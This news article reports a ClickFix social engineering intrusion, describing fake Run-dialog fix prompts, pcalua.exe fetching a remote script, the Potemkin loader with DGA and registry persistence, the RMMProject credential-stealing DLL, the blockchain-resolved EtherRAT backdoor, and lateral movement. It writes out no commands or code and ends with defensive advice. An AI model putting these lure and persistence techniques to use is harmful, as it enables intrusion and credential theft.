Cybersecurity researchers have uncovered a sophisticated attack leveraging the ClickFix social engineering technique to infiltrate organizational networks. This method deceives users into executing malicious commands under the guise of legitimate troubleshooting steps, leading to the installation of MSI packages and subsequent hands-on-keyboard attacks.
The ClickFix technique involves presenting users with fake prompts that instruct them to press the Windows key + R, paste a provided command into the Run dialog, and press Enter. This sequence appears as a routine fix but is designed to exploit the user’s trust and initiate the attack chain.
In a recent incident analyzed by Huntress in May 2026, an attacker utilized ClickFix to gain initial access to an organization’s network. The attack began when a user visited a compromised website and followed the deceptive instructions. This action triggered the execution of pcalua.exe, a legitimate Windows utility, which silently fetched and ran a remote script. The script downloaded and installed an MSI package in the background without any visible indication to the user.
The MSI package deployed a custom loader named Potemkin into the user’s AppData folder and registered a startup registry key to ensure persistence across reboots. Potemkin employs a Domain Generation Algorithm (DGA) to produce thousands of candidate domains, probing each until it connects to a live command-and-control server. Once connected, it fetches and loads RMMProject, a 4.4 MB DLL with capabilities including browser credential theft, cookie stealing across multiple browsers, a hidden remote desktop module, and process injection.
Simultaneously, the attacker deployed EtherRAT, a Node.js-based backdoor that retrieves its command-and-control server address from the Ethereum blockchain. This method complicates traditional domain takedown efforts, enhancing the attack’s resilience. The intrusion escalated rapidly, with the attacker moving laterally across the network using tools like WMIExec and SMBExec, disabling Windows Defender, and compromising over 11 systems before detection.
This incident underscores the evolving sophistication of social engineering attacks and the critical importance of user vigilance. Organizations must prioritize comprehensive security awareness training to educate users about deceptive tactics like ClickFix. Additionally, implementing robust endpoint detection and response solutions can help identify and mitigate such threats before they escalate.
